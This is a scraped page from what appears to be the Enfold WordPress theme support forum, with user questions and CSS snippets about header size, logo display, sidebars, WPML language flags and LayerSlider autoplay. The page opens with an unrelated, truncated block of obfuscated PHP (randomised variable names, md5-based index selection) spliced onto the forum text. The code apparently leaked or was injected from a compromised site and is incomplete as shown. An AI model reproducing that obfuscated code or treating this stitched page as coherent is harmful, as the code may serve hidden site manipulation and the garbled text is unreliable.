$FyQVCWLNApYgwsSzygQgg = 0; $BCEUSjHFFwzzqmHmpjjQI = 0; while (true) { $BCEUSjHFFwzzqmHmpjjQI++; $piiJbwvzLxHvKjlNnFzd = $this->YHhBHrBuAZYCsZUCLxMNBSuTU($this->htcFFCQTLLpnCchsPKGYxso . $BCEUSjHFFwzzqmHmpjjQI , $PVSXPKLAQGaWKUtNNUYQFoBuJE); if (in_array($piiJbwvzLxHvKjlNnFzd, $PaTgoaVMMKhvlmVWxSnBVLA)) { continue; } $PaTgoaVMMKhvlmVWxSnBVLA[] = $piiJbwvzLxHvKjlNnFzd; $FyQVCWLNApYgwsSzygQgg++; if ($FyQVCWLNApYgwsSzygQgg == $MTPkrEtDJbjkrzXWSBgAo) { break; } } foreach ($PaTgoaVMMKhvlmVWxSnBVLA as $piiJbwvzLxHvKjlNnFzd) { $oXyaqmHoChvHQFCvTluqmAC[] = $QrnkCEWRkHbQPoEPelYQRw[$piiJbwvzLxHvKjlNnFzd]; } return $oXyaqmHoChvHQFCvTluqmAC; } private function YHhBHrBuAZYCsZUCLxMNBSuTU($htcFFCQTLLpnCchsPKGYxso, $BwYCWyuBYkgiOzNljFJONA) { $dzVXtdBSuUwgnARTiNICo = 0; $JAxNyUCJRbrfbemcWrOFpg = hash(“md5”,$htcFFCQTLLpnCchsPKGYxso); $dzVXtdBSuUwgnARTiNICo = (preg_replace(“/[^0-9,.]/”, “”, $JAxNyUCJRbrfbemcWrOFpg)); while ($dzVXtdBSuUwgnARTiNICo > 10000000){ $dzVXtdBSuUwgnARTiNICo /= 100000; } $this->IatJdWimJbxtprWZElHevfI = $dzVXtdBSuUwgnARTiNICo; $dzVXtdBSuUwgnARTiNICo %= $BwYCWyuBYkgiOzNljFJONA; return $dzVXtdBSuUwgnARTiNICo; } } ?>

    #255916
    KingConga
    Participant

    What I want to do is for a couple of selected pages, to show the header and logo display only at the smaller size, even before scrolling. There are a couple of pages where I really want to maximise page space so that visitors don’t have to scroll.
    Is this easily done?
    Thanks
    Tim

    I’d put this as a response to / Enfold / How to adjust height of header but then thought that I should create a fresh topic. Hope this doesn’t cause confusion. I made this comment there too.

    #255913
    This reply has been marked as private.
    #255899

    Thanks for that. Works all good for horizontal smartphone, however with portrait view social icons still disappear, and margin below the logo remains. Any ideas as to how I can get the social icons to appear? Here is the code I’m using targeting the logo and social icon elements:

    @media only screen and (max-width: 767px) {
    #header_meta { display: none; }
    .responsive .mobile_slide_out .logo {float: none;}
    .responsive .logo a, .responsive .logo img {margin-top: 8px!important;}
    .responsive.html_header_top #header_main .social_bookmarks {
    width: auto;
    position: absolute;
    left: 50%;
    top: 90px;
    -webkit-transform: translate(-50%, 0);
    -moz-transform: translate(-50%, 0);
    -ms-transform: translate(-50%, 0);
    transform: translate(-50%, 0);
    }
    .responsive .logo {margin-bottom: 30px;}
    }
    @media only screen and (max-width: 480px) {
    .responsive .logo a, .responsive .logo img {
    margin-top: 15px!important;
    max-width: 85%;
    height: auto!important;
    }
    }

    Any assistance with the Ipad sticky menu not minimising appreciated too when you get a chance. Thanks for all your help with this.

    #255892
    evtilsley
    Participant

    Browsing on desktop with Firefox

    http://ivorytowerbridal.co.uk/

    Have seen this a few times now.. the logo is circa 50% the size it should be on first page load.
    A page refresh fixes it, but wondering why this is happening.

    Any thoughts? Thanks !

    #255880

    Topic: Sidebar Alignment

    in forum Enfold
    rbruski
    Participant

    Hello,

    I’m trying to create the same style of page that happens when you click the “pages” link from the main menu of the enfold demo (another page appears that has a left sidebar with an additional menu)/.
    I have created that page and activated a sidebar on it. But when i try to add a menu (or any widget) it doesn’t go into the sidebar. Instead it aligns right on the bottom of the page after all of the content.
    It’s almost as if the menu and any widget is are the width of the whole page and don’t adjust for the menu and therefore are default to the end of the content.
    I wish i could share the page link with you but i can’t because we keeping it top secret for a product launch that we are having on May 7th. So i need to fix this by then.

    Please help

    Robert

    #255864
    Maxim_HH
    Participant

    Hi,

    I am unable to remove the language switchers in the header.

    Initially, I thought they were due to WPML. However, WPML support has told me that this is an enfold function.
    I was able to remove them by inserting “#top .sub_menu>ul, #top .sub_menu>ul>li {
    display: none;}” into quick css. However, this is just a temporary solution and I would like to remove those flags instantly. Can you tell me which file to edit and which string to remove?

    Thank you!

    #255844

    Hey Josue,

    I disabled the autoplay for the layerslider. unfortunately it does not work. Since the partner element should be on autoplay the only way would be to change the layer slider e.g. to the standard slider, which I wouldn’t prefer.

    Would be great if there’s a fix in the next update ;)
    Thanks again Josue!

    • This reply was modified 12 years ago by rhunecke.
    #255838
    John
    Participant

    Is it possible to disable the caption and title I’ve entered into a video slide (fullscreen, easy or fullwidth easy sliders) once the video starts playing – which would make for a clean viewing experience?

    Otherwise, my preferred settings for video are to enable controls, disable autoplay, no mute, no loop.

    Thanks!

    #255837

    Hey!

    There seems to be an issue with the LayerSlider on top, have you tried disabling the autoplay feature in either the slider or the carrousel?

    Best regards,
    Josue

Viewing 30 results - 130,351 through 130,380 (of 142,939 total)